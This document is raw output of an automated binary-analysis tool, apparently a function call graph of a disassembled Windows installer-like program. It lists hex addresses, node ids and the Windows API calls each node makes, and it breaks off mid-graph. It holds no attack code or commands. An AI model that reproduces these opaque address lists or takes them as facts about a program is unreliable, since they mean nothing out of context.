49994->49997 49995 4913d8 50127 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 49995->50127 50051 452c54 49996->50051 50128 452744 49997->50128 50010 49147b 50001->50010 50011 4914b4 50001->50011 50006 446ff0 18 API calls 50002->50006 50003 4913e9 50003->49976 50004 491389 50124 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50004->50124 50005 491417 50135 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50005->50135 50009 491449 50006->50009 50136 452de4 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 50009->50136 50013 446ff0 18 API calls 50010->50013 50017 4914fc 50011->50017 50018 4914c3 50011->50018 50015 49148a 50013->50015 50014 491456 50137 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50014->50137 50019 446ff0 18 API calls 50015->50019 50024 49150f 50017->50024 50029 4915c5 50017->50029 50020 446ff0 18 API calls 50018->50020 50021 49149b 50019->50021 50022 4914d2 50020->50022 50138 447270 50021->50138 50023 446ff0 18 API calls 50022->50023 50025 4914e3 50023->50025 50027 446ff0 18 API calls 50024->50027 50033 447270 5 API calls 50025->50033 50028 49153c 50027->50028 50030 446ff0 18 API calls 50028->50030 50029->49976 50147 446f94 18 API calls 50029->50147 50031 491553 50030->50031 50144 407dcc 7 API calls 50031->50144 50033->49976 50034 4915de 50148 42e8c0 FormatMessageA 50034->50148 50039 491575 50040 446ff0 18 API calls 50039->50040 50041 491589 50040->50041 50145 4084f8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50041->50145 50043 491594 50146 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50043->50146 50045 4915a0 50047 446ff8 50046->50047 50161 436070 50047->50161 50049 447017 50050 42c600 7 API calls 50049->50050 50050->49984 50211 4526f8 50051->50211 50053 452c71 50053->50004 50054 452c6d 50054->50053 50055 452c95 MoveFileA GetLastError 50054->50055 50217 452734 50055->50217 50058->49976 50060 406baf 50059->50060 50061 406bd1 50060->50061 50062 406bc8 50060->50062 50220 403778 50061->50220 50063 403400 4 API calls 50062->50063 50064 406bcf 50063->50064 50066 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50064->50066 50066->49976 50067->49881 50068->49976 50069->49888 50070->49976 50071->49891 50072->49976 50227 403738 50073->50227 50076->49976 50078 403738 50077->50078 50079 42c81f GetFullPathNameA 50078->50079 50080 42c842 50079->50080 50081 42c82b 50079->50081 50083 403494 4 API calls 50080->50083 50081->50080 50082 42c833 50081->50082 50084 4034e0 4 API calls 50082->50084 50085 42c840 50083->50085 50084->50085 50086 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50085->50086 50086->49976 50087->49914 50088->49976 50089->49925 50090->49976 50229 42c794 50091->50229 50094 403778 4 API calls 50095 42c8bd 50094->50095 50096 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50095->50096 50096->49976 50244 42c66c 50097->50244 50100 42c8e1 50103 403778 4 API calls 50100->50103 50101 42c8d8 50102 403400 4 API calls 50101->50102 50104 42c8df 50102->50104 50103->50104 50105 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50104->50105 50105->49976 50106->49944 50107->49976 50109 42c794 IsDBCSLeadByte 50108->50109 50110 42c934 50109->50110 50111 403778 4 API calls 50110->50111 50112 42c946 50111->50112 50113 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50112->50113 50113->49976 50115 42c794 IsDBCSLeadByte 50114->50115 50116 42c95c 50115->50116 50117 403778 4 API calls 50116->50117 50118 42c96d 50117->50118 50119 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50118->50119 50119->49976 50120->49969 50121->49976 50122->49982 50123->49976 50124->49976 50125->49976 50126->49995 50127->50003 50129 4526f8 2 API calls 50128->50129 50130 45275a 50129->50130 50131 45275e 50130->50131 50132 45277c CreateDirectoryA GetLastError 50130->50132 50131->50005 50133 452734 Wow64RevertWow64FsRedirection 50132->50133 50134 4527a2 50133->50134 50134->50005 50135->49976 50136->50014 50137->49976 50139 447278 50138->50139 50247 4363d8 VariantClear 50139->50247 50141 44729b 50143 4472b2 50141->50143 50248 408bfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50141->50248 50143->49976 50144->50039 50145->50043 50146->50045 50147->50034 50149 42e8e6 50148->50149 50150 4034e0 4 API calls 50149->50150 50151 42e903 50150->50151 50152 447344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 50151->50152 50152->49976 50154 403426 50153->50154 50155 40344b 50154->50155 50156 402660 4 API calls 50154->50156 50157 403400 50155->50157 50156->50154 50158 403406 50157->50158 50159 40341f 50157->50159 50158->50159 50160 402660 4 API calls 50158->50160 50160->50159 50162 43607c 50161->50162 50164 43609e 50161->50164 50162->50164 50181 408bfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50162->50181 50163 436121 50190 408bfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50163->50190 50164->50163 50166 4360f1 50164->50166 50167 4360e5 50164->50167 50168 436115 50164->50168 50169 436109 50164->50169 50174 4360fd 50164->50174 50173 403510 4 API calls 50166->50173 50182 403510 50167->50182 50189 4040e8 18 API calls 50168->50189 50185 403494 50169->50185 50171 436132 50171->50049 50178 4360fa 50173->50178 50174->50049 50178->50049 50180 43611e 50180->50049 50181->50164 50191 4034e0 50182->50191 50186 403498 50185->50186 50187 4034ba 50186->50187 50206 402660 50186->50206 50187->50049 50189->50180 50190->50171 50196 4034bc 50191->50196 50193 4034f0 50194 403400 4 API calls 50193->50194 50195 403508 50194->50195 50195->50049 50197 4034c0 50196->50197 50198 4034dc 50196->50198 50201 402648 50197->50201 50198->50193 50200 4034c9 50200->50193 50202 40264c 50201->50202 50203 402656 50201->50203 50202->50203 50205 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50202->50205 50203->50200 50203->50203 50205->50203 50207 402664 50206->50207 50208 40266e 50206->50208 50207->50208 50210 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50207->50210 50208->50187 50208->50208 50210->50208 50212 452706 50211->50212 50213 452702 50211->50213 50214 45270f Wow64DisableWow64FsRedirection 50212->50214 50215 452728 SetLastError 50212->50215 50213->50054 50216 452723 50214->50216 50215->50216 50216->50054 50218 452743 50217->50218 50219 452739 Wow64RevertWow64FsRedirection 50217->50219 50218->50004 50219->50218 50221 4037aa 50220->50221 50223 40377d 50220->50223 50222 403400 4 API calls 50221->50222 50226 4037a0 50222->50226 50223->50221 50224 403791 50223->50224 50225 4034e0 4 API calls 50224->50225 50225->50226 50226->50064 50228 40373c SetCurrentDirectoryA 50227->50228 50228->49900 50234 42c674 50229->50234 50231 42c7f3 50231->50094 50233 42c7a9 50233->50231 50241 42c43c IsDBCSLeadByte 50233->50241 50237 42c685 50234->50237 50235 42c6e9 50238 42c6e4 50235->50238 50243 42c43c IsDBCSLeadByte 50235->50243 50237->50235 50239 42c6a3 50237->50239 50238->50233 50239->50238 50242 42c43c IsDBCSLeadByte 50239->50242 50241->50233 50242->50239 50243->50238 50245 42c674 IsDBCSLeadByte 50244->50245 50246 42c673 50245->50246 50246->50100 50246->50101 50247->50141 50248->50143 50249 480002 50250 48000b 50249->50250 50252 480036 50249->50252 50251 480028 50250->50251 50250->50252 50663 4766e4 188 API calls 50251->50663 50253 480075 50252->50253 50665 47eaec LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50252->50665 50254 480099 50253->50254 50257 48008c 50253->50257 50258 48008e 50253->50258 50262 4800d5 50254->50262 50263 4800b7 50254->50263 50267 47eb30 42 API calls 50257->50267 50667 47ebc4 42 API calls 50258->50667 50259 48002d 50259->50252 50664 408bd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 50259->50664 50260 480068 50666 47eb54 42 API calls 50260->50666 50670 47e984 24 API calls 50262->50670 50268 4800cc 50263->50268 50668 47eb54 42 API calls 50263->50668 50267->50254 50669 47e984 24 API calls 50268->50669 50270 4800d3 50272 4800eb 50270->50272 50273 4800e5 50270->50273 50274 4800e9 50272->50274 50275 47eb30 42 API calls 50272->50275 50273->50274 50375 47eb30 50273->50375 50380 47bf1c 50274->50380 50275->50274 50739 47e618 42 API calls 50375->50739 50377 47eb4b 50740 408bd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 50377->50740 50741 42d890 GetWindowsDirectoryA 50380->50741 50382 47bf3a 50383 403450 4 API calls 50382->50383 50384 47bf47 50383->50384 50743 42d8bc GetSystemDirectoryA 50384->50743 50386 47bf4f 50387 403450 4 API calls 50386->50387 50388 47bf5c 50387->50388 50745 42d8e8 50388->50745 50390 47bf64 50391 403450 4 API calls 50390->50391 50392 47bf71 50391->50392 50393 47bf96 50392->50393 50394 47bf7a 50392->50394 50396 403400 4 API calls 50393->50396 50801 42d200 50394->50801 50398 47bf94 50396->50398 50400 47bfdb 50398->50400 50402 42c8c4 5 API calls 50398->50402 50399 403450 4 API calls 50399->50398 50749 47bda4 50400->50749 50404 47bfb6 50402->50404 50406 403450 4 API calls 50404->50406 50405 403450 4 API calls 50409 47bff7 50405->50409 50407 47bfc3 50406->50407 50407->50400 50410 403450 4 API calls 50407->50410 50408 47c015 50412 47bda4 8 API calls 50408->50412 50409->50408 50411 4035c0 4 API calls 50409->50411 50410->50400 50411->50408 50413 47c024 50412->50413 50414 403450 4 API calls 50413->50414 50415 47c031 50414->50415 50416 47c059 50415->50416 50417 42c3f4 5 API calls 50415->50417 50418 47c0c0 50416->50418 50422 47bda4 8 API calls 50416->50422 50419 47c047 50417->50419 50420 47c0ea 50418->50420 50421 47c0c9 50418->50421 50423 4035c0 4 API calls 50419->50423 50760 42c3f4 50420->50760 50424 42c3f4 5 API calls 50421->50424 50425 47c071 50422->50425 50423->50416 50427 47c0d6 50424->50427 50428 403450 4 API calls 50425->50428 50430 4035c0 4 API calls 50427->50430 50431 47c07e 50428->50431 50433 47c0e8 50430->50433 50434 47c091 50431->50434 50809 453318 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50431->50809 50792 47be88 50433->50792 50436 47bda4 8 API calls 50434->50436 50438 47c0a0 50436->50438 50663->50259 50665->50260 50666->50253 50667->50254 50668->50268 50669->50270 50670->50270 50739->50377 50742 42d8b1 50741->50742 50742->50382 50744 42d8dd 50743->50744 50744->50386 50746 403400 4 API calls 50745->50746 50747 42d8f8 GetModuleHandleA GetProcAddress 50746->50747 50748 42d911 50747->50748 50748->50390 50811 42de14 50749->50811 50751 47bdca 50752 47bdf0 50751->50752 50753 47bdce 50751->50753 50755 403400 4 API calls 50752->50755 50814 42dd44 50753->50814 50756 47bdf7 50755->50756 50756->50405 50758 47bde5 RegCloseKey 50758->50756 50759 403400 4 API calls 50759->50758 50761 42c421 50760->50761 50762 42c3fe 50760->50762 50764 403494 4 API calls 50761->50764 50848 42c974 CharPrevA 50762->50848 50765 42c42a 50764->50765 50766 42c405 50766->50761 50802 4038a4 4 API calls 50801->50802 50803 42d213 50802->50803 50804 42d22a GetEnvironmentVariableA 50803->50804 50808 42d23d 50803->50808 50849 42dbc8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50803->50849 50804->50803 50805 42d236 50804->50805 50806 403400 4 API calls 50805->50806 50806->50808 50808->50399 50809->50434 50812 42de25 RegOpenKeyExA 50811->50812 50813 42de1f 50811->50813 50812->50751 50813->50812 50817 42dbf8 50814->50817 50818 42dc1e RegQueryValueExA 50817->50818 50824 42dc41 50818->50824 50833 42dc63 50818->50833 50819 403400 4 API calls 50821 42dd2f 50819->50821 50820 42dc5b 50822 403400 4 API calls 50820->50822 50821->50758 50821->50759 50822->50833 50823 4034e0 4 API calls 50823->50824 50824->50820 50824->50823 50824->50833 50834 403744 50824->50834 50826 42dc98 RegQueryValueExA 50826->50818 50827 42dcb4 50826->50827 50827->50833 50838 4038a4 50827->50838 50830 42dd08 50831 403450 4 API calls 50830->50831 50831->50833 50832 403744 4 API calls 50832->50830 50833->50819 50835 40374a 50834->50835 50837 40375b 50834->50837 50836 4034bc 4 API calls 50835->50836 50835->50837 50836->50837 50837->50826 50839 4038b1 50838->50839 50840 4038e1 50838->50840 50841 4038da 50839->50841 50843 4038bd 50839->50843 50842 403400 4 API calls 50840->50842 50844 4034bc 4 API calls 50841->50844 50845 4038cb 50842->50845 50847 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50843->50847 50844->50840 50845->50830 50845->50832 50847->50845 50848->50766 50849->50803 52914 491d44 52915 491d78 52914->52915 52916 491d7a 52915->52916 52917 491d8e 52915->52917 53050 446f94 18 API calls 52916->53050 52920 491dca 52917->52920 52921 491d9d 52917->52921 52919 491d83 Sleep 52976 491dc5 52919->52976 52926 491dd9 52920->52926 52927 491e06 52920->52927 52922 446ff0 18 API calls 52921->52922 52925 491dac 52922->52925 52923 403420 4 API calls 52924 492238 52923->52924 52928 491db4 FindWindowA 52925->52928 52929 446ff0 18 API calls 52926->52929 52932 491e5c 52927->52932 52933 491e15 52927->52933 52931 447270 5 API calls 52928->52931 52930 491de6 52929->52930 52934 491dee FindWindowA 52930->52934 52931->52976 52938 491eb8 52932->52938 52939 491e6b 52932->52939 53051 446f94 18 API calls 52933->53051 52936 447270 5 API calls 52934->52936 52992 491e01 52936->52992 52937 491e21 53052 446f94 18 API calls 52937->53052 52945 491f14 52938->52945 52946 491ec7 52938->52946 53055 446f94 18 API calls 52939->53055 52942 491e2e 53053 446f94 18 API calls 52942->53053 52943 491e77 53056 446f94 18 API calls 52943->53056 52956 491f4e 52945->52956 52957 491f23 52945->52957 53060 446f94 18 API calls 52946->53060 52948 491e3b 53054 446f94 18 API calls 52948->53054 52950 491e84 53057 446f94 18 API calls 52950->53057 52952 491e46 SendMessageA 52955 447270 5 API calls 52952->52955 52953 491ed3 53061 446f94 18 API calls 52953->53061 52955->52992 52967 491f5d 52956->52967 52973 491f9c 52956->52973 52960 446ff0 18 API calls 52957->52960 52959 491e91 53058 446f94 18 API calls 52959->53058 52963 491f30 52960->52963 52961 491ee0 53062 446f94 18 API calls 52961->53062 52969 491f38 RegisterClipboardFormatA 52963->52969 52965 491e9c PostMessageA 53059 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52965->53059 52966 491eed 53063 446f94 18 API calls 52966->53063 53065 446f94 18 API calls 52967->53065 52972 447270 5 API calls 52969->52972 52972->52976 52977 491fab 52973->52977 52978 491ff0 52973->52978 52974 491ef8 SendNotifyMessageA 53064 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52974->53064 52975 491f69 53066 446f94 18 API calls 52975->53066 52976->52923 53068 446f94 18 API calls 52977->53068 52986 491fff 52978->52986 52987 492044 52978->52987 52981 491f76 53067 446f94 18 API calls 52981->53067 52984 491fb7 53069 446f94 18 API calls 52984->53069 52985 491f81 SendMessageA 52989 447270 5 API calls 52985->52989 53072 446f94 18 API calls 52986->53072 52995 492053 52987->52995 52996 4920a6 52987->52996 52989->52992 52991 491fc4 53070 446f94 18 API calls 52991->53070 52992->52976 52993 49200b 53073 446f94 18 API calls 52993->53073 52999 446ff0 18 API calls 52995->52999 53004 49212d 52996->53004 53005 4920b5 52996->53005 52998 491fcf PostMessageA 53071 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52998->53071 53002 492060 52999->53002 53000 492018 53074 446f94 18 API calls 53000->53074 53006 42e38c 2 API calls 53002->53006 53015 49213c 53004->53015 53016 492162 53004->53016 53008 446ff0 18 API calls 53005->53008 53009 49206d 53006->53009 53007 492023 SendNotifyMessageA 53075 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53007->53075 53011 4920c4 53008->53011 53012 492083 GetLastError 53009->53012 53013 492073 53009->53013 53076 446f94 18 API calls 53011->53076 53017 447270 5 API calls 53012->53017 53014 447270 5 API calls 53013->53014 53018 492081 53014->53018 53081 446f94 18 API calls 53015->53081 53023 492171 53016->53023 53024 492194 53016->53024 53017->53018 53022 447270 5 API calls 53018->53022 53021 492146 FreeLibrary 53082 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53021->53082 53022->52976 53027 446ff0 18 API calls 53023->53027 53033 4921a3 53024->53033 53039 4921d7 53024->53039 53025 4920d7 GetProcAddress 53028 49211d 53025->53028 53029 4920e3 53025->53029 53030 49217d 53027->53030 53080 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53028->53080 53077 446f94 18 API calls 53029->53077 53035 492185 CreateMutexA 53030->53035 53083 48c174 18 API calls 53033->53083 53034 4920ef 53078 446f94 18 API calls 53034->53078 53035->52976 53038 4920fc 53042 447270 5 API calls 53038->53042 53039->52976 53085 48c174 18 API calls 53039->53085 53041 4921af 53043 4921c0 OemToCharBuffA 53041->53043 53044 49210d 53042->53044 53084 48c18c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53043->53084 53079 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53044->53079 53047 4921f2 53048 492203 CharToOemBuffA 53047->53048 53086 48c18c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53048->53086 53050->52919 53051->52937 53052->52942 53053->52948 53054->52952 53055->52943 53056->52950 53057->52959 53058->52965 53059->52992 53060->52953 53061->52961 53062->52966 53063->52974 53064->52976 53065->52975 53066->52981 53067->52985 53068->52984 53069->52991 53070->52998 53071->52992 53072->52993 53073->53000 53074->53007 53075->52976 53076->53025 53077->53034 53078->53038 53079->52992 53080->52992 53081->53021 53082->52976 53083->53041 53084->52976 53085->53047 53086->52976 53087 41ee4c 53088 41ee91 53087->53088 53089 41ee5b IsWindowVisible 53087->53089 53089->53088 53090 41ee65 IsWindowEnabled 53089->53090 53090->53088 53091 41ee6f 53090->53091 53092 402648 4 API calls 53091->53092 53093 41ee79 EnableWindow 53092->53093 53093->53088 53618 47ff68 53623 450fd8 53618->53623 53620 47ff7c 53633 47f054 53620->53633 53622 47ffa0 53624 450fe5 53623->53624 53626 451039 53624->53626 53642 408bfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53624->53642 53639 450e5c 53626->53639 53630 451061 53632 4510a4 53630->53632 53644 408bfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53630->53644 53632->53620 53649 40b5b0 53633->53649 53635 47f0c1 53635->53622 53637 47f076 53637->53635 53653 4069cc 53637->53653 53656 476428 53637->53656 53645 450e08 53639->53645 53642->53626 53643 408bfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53643->53630 53644->53632 53646 450e2b 53645->53646 53647 450e1a 53645->53647 53646->53630 53646->53643 53648 450e1f InterlockedExchange 53647->53648 53648->53646 53650 40b5bb 53649->53650 53651 40b5db 53650->53651 53672 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53650->53672 53651->53637 53654 402648 4 API calls 53653->53654 53655 4069d7 53654->53655 53655->53637 53669 476459 53656->53669 53670 4764a2 53656->53670 53657 4764ed 53673 451268 53657->53673 53658 451268 21 API calls 53658->53669 53660 476504 53662 403420 4 API calls 53660->53662 53661 4038a4 4 API calls 53661->53669 53664 47651e 53662->53664 53663 4038a4 4 API calls 53663->53670 53664->53637 53665 403744 4 API calls 53665->53669 53666 403450 4 API calls 53666->53669 53667 403744 4 API calls 53667->53670 53668 403450 4 API calls 53668->53670 53669->53658 53669->53661 53669->53665 53669->53666 53669->53670 53670->53657 53670->53663 53670->53667 53670->53668 53671 451268 21 API calls 53670->53671 53671->53670 53672->53651 53674 451283 53673->53674 53675 451278 53673->53675 53679 45120c 21 API calls 53674->53679 53675->53660 53677 45128e 53677->53675 53680 408bfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53677->53680 53679->53677 53680->53675 53094 41fb50 53095 41fb59 53094->53095 53098 41fdf4 53095->53098 53097 41fb66 53099 41fee6 53098->53099 53100 41fe0b 53098->53100 53099->53097 53100->53099 53119 41f9b4 GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53100->53119 53102 41fe41 53103 41fe45 53102->53103 53104 41fe6b 53102->53104 53120 41fb94 53103->53120 53129 41f9b4 GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53104->53129 53107 41fe79 53109 41fea3 53107->53109 53110 41fe7d 53107->53110 53113 41fb94 10 API calls 53109->53113 53112 41fb94 10 API calls 53110->53112 53111 41fb94 10 API calls 53118 41fe69 53111->53118 53114 41fe8f 53112->53114 53115 41feb5 53113->53115 53116 41fb94 10 API calls 53114->53116 53117 41fb94 10 API calls 53115->53117 53116->53118 53117->53118 53118->53097 53119->53102 53121 41fbaf 53120->53121 53122 41f934 4 API calls 53121->53122 53123 41fbc5 53121->53123 53122->53123 53130 41f934 53123->53130 53125 41fc0d 53126 41fc30 SetScrollInfo 53125->53126 53138 41fa94 53126->53138 53129->53107 53149 4181d8 53130->53149 53132 41f951 GetWindowLongA 53133 41f98e 53132->53133 53134 41f96e 53132->53134 53152 41f8c0 GetWindowLongA GetSystemMetrics GetSystemMetrics 53133->53152 53151 41f8c0 GetWindowLongA GetSystemMetrics GetSystemMetrics 53134->53151 53137 41f97a 53137->53125 53139 41faa2 53138->53139 53140 41faaa 53138->53140 53139->53111 53141 41fae9 53140->53141 53142 41fad9 53140->53142 53148 41fae7 53140->53148 53154 417e40 IsWindowVisible ScrollWindow SetWindowPos 53141->53154 53153 417e40 IsWindowVisible ScrollWindow SetWindowPos 53142->53153 53143 41fb29 GetScrollPos 53143->53139 53146 41fb34 53143->53146 53147 41fb43 SetScrollPos 53146->53147 53147->53139 53148->53143 53150 4181e2 53149->53150 53150->53132 53151->53137 53152->53137 53153->53148 53154->53148 53155 420590 53156 4205a3 53155->53156 53176 415b28 53156->53176 53158 4206ea 53159 420701 53158->53159 53183 4146cc KiUserCallbackDispatcher 53158->53183 53160 420718 53159->53160 53184 414710 KiUserCallbackDispatcher 53159->53184 53166 42073a 53160->53166 53185 420058 12 API calls 53160->53185 53161 4205de 53161->53158 53162 420649 53161->53162 53169 42063a MulDiv 53161->53169 53181 420840 20 API calls 53162->53181 53167 420662 53167->53158 53182 420058 12 API calls 53167->53182 53180 41a2fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue DeleteObject 53169->53180 53172 42067f 53173 42069b MulDiv 53172->53173 53174 4206be 53172->53174 53173->53174 53174->53158 53175 4206c7 MulDiv 53174->53175 53175->53158 53177 415b3a 53176->53177 53186 414468 53177->53186 53179 415b52 53179->53161 53180->53162 53181->53167 53182->53172 53183->53159 53184->53160 53185->53166 53187 414482 53186->53187 53190 410640 53187->53190 53189 414498 53189->53179 53193 40de8c 53190->53193 53192 410646 53192->53189 53194 40deee 53193->53194 53195 40de9f 53193->53195 53200 40defc 53194->53200 53198 40defc 19 API calls 53195->53198 53199 40dec9 53198->53199 53199->53192 53201 40df0c 53200->53201 53203 40df22 53201->53203 53212 40e284 53201->53212 53228 40d7c8 53201->53228 53231 40e134 53203->53231 53206 40d7c8 5 API calls 53207 40df2a 53206->53207 53207->53206 53208 40df96 53207->53208 53234 40dd48 53207->53234 53209 40e134 5 API calls 53208->53209 53211 40def8 53209->53211 53211->53192 53248 40eb54 53212->53248 53214 403778 4 API calls 53215 40e2bf 53214->53215 53215->53214 53216 40e375 53215->53216 53310 40d95c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53215->53310 53311 40e268 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53215->53311 53217 40e390 53216->53217 53218 40e39f 53216->53218 53257 40e5a8 53217->53257 53307 40bc0c 53218->53307 53224 40e39d 53225 403400 4 API calls 53224->53225 53226 40e444 53225->53226 53226->53201 53229 40ebf0 5 API calls 53228->53229 53230 40d7d2 53229->53230 53230->53201 53344 40d6a4 53231->53344 53353 40e13c 53234->53353 53237 40eb54 5 API calls 53238 40dd86 53237->53238 53239 40eb54 5 API calls 53238->53239 53240 40dd91 53239->53240 53241 40dda3 53240->53241 53242 40ddac 53240->53242 53247 40dda9 53240->53247 53363 40dcb0 19 API calls 53241->53363 53360 40dbc0 53242->53360 53245 403420 4 API calls 53246 40de77 53245->53246 53246->53207 53247->53245 53313 40d968 53248->53313 53251 4034e0 4 API calls 53252 40eb77 53251->53252 53253 403744 4 API calls 53252->53253 53254 40eb7e 53253->53254 53255 40d968 5 API calls 53254->53255 53256 40eb8c 53255->53256 53256->53215 53258 40e5d4 53257->53258 53259 40e5de 53257->53259 53318 40d628 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53258->53318 53261 40e620 53259->53261 53262 40e6c1 53259->53262 53263 40e651 53259->53263 53264 40e6a3 53259->53264 53265 40e6f9 53259->53265 53266 40e67d 53259->53266 53267 40e6de 53259->53267 53268 40e75e 53259->53268 53300 40e644 53259->53300 53319 40d94c 53261->53319 53329 40eb90 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53262->53329 53263->53300 53325 40da00 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53263->53325 53328 40dfcc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53264->53328 53269 40d94c 5 API calls 53265->53269 53326 40e00c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53266->53326 53331 40ea78 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53267->53331 53275 40d94c 5 API calls 53268->53275 53278 40e701 53269->53278 53271 403400 4 API calls 53279 40e7d3 53271->53279 53282 40e766 53275->53282 53286 40e70b 53278->53286 53294 40e705 53278->53294 53279->53224 53280 40e6cc 53330 409f20 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53280->53330 53281 40e688 53327 40d658 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53281->53327 53289 40e783 53282->53289 53290 40e76a 53282->53290 53284 40e649 53324 40e0c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53284->53324 53285 40e62c 53322 40e00c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53285->53322 53332 40ebf0 53286->53332 53338 40e00c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53289->53338 53297 40ebf0 5 API calls 53290->53297 53295 40e709 53294->53295 53299 40ebf0 5 API calls 53294->53299 53295->53300 53336 40e00c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53295->53336 53297->53300 53298 40e637 53323 40e454 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53298->53323 53303 40e72c 53299->53303 53300->53271 53335 40da88 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53303->53335 53304 40e74e 53337 40e4bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53304->53337 53339 40bbb8 53307->53339 53310->53215 53311->53215 53312 40d95c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53312->53224 53316 40d973 53313->53316 53314 40d9ad 53314->53251 53316->53314 53317 40d9b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53316->53317 53317->53316 53318->53259 53320 40ebf0 5 API calls 53319->53320 53321 40d956 53320->53321 53321->53284 53321->53285 53322->53298 53323->53300 53324->53263 53325->53300 53326->53281 53327->53300 53328->53300 53329->53280 53330->53300 53331->53300 53333 40d968 5 API calls 53332->53333 53334 40ebfd 53333->53334 53334->53300 53335->53295 53336->53304 53337->53300 53338->53300 53340 40bbca 53339->53340 53342 40bbef 53339->53342 53340->53342 53343 40bc6c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53340->53343 53342->53224 53342->53312 53343->53342 53345 40ebf0 5 API calls 53344->53345 53346 40d6b1 53345->53346 53347 40d6c4 53346->53347 53351 40ecf4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53346->53351 53347->53207 53349 40d6bf 53352 40d640 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53349->53352 53351->53349 53352->53347 53354 40d94c 5 API calls 53353->53354 53355 40e153 53354->53355 53356 40ebf0 5 API calls 53355->53356 53359 40dd7b 53355->53359 53357 40e160 53356->53357 53357->53359 53364 40e0c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53357->53364 53359->53237 53365 40ad64 19 API calls 53360->53365 53362 40dbe8 53362->53247 53363->53247 53364->53359 53365->53362 53681 413634 SetWindowLongA GetWindowLongA 53682 413691 SetPropA SetPropA 53681->53682 53683 413673 GetWindowLongA 53681->53683 53688 41f394 53682->53688 53683->53682 53684 413682 SetWindowLongA 53683->53684 53684->53682 53693 423c04 53688->53693 53787 423a7c 53688->53787 53794 415268 53688->53794 53689 4136e1 53698 423c3a 53693->53698 53696 423ce4 53699 423ceb 53696->53699 53700 423d1f 53696->53700 53697 423c85 53701 423c8b 53697->53701 53702 423d48 53697->53702 53714 423c5b 53698->53714 53801 423b60 53698->53801 53703 423cf1 53699->53703 53747 423fa9 53699->53747 53706 424092 IsIconic 53700->53706 53707 423d2a 53700->53707 53704 423c90 53701->53704 53705 423cbd 53701->53705 53708 423d63 53702->53708 53709 423d5a 53702->53709 53711 423f0b SendMessageA 53703->53711 53712 423cff 53703->53712 53715 423c96 53704->53715 53716 423dee 53704->53716 53705->53714 53736 423cd6 53705->53736 53737 423e37 53705->53737 53713 4240a6 GetFocus 53706->53713 53706->53714 53717 423d33 53707->53717 53718 4240ce 53707->53718 53816 42418c 11 API calls 53708->53816 53719 423d70 53709->53719 53720 423d61 53709->53720 53711->53714 53712->53714 53739 423cb8 53712->53739 53767 423f4e 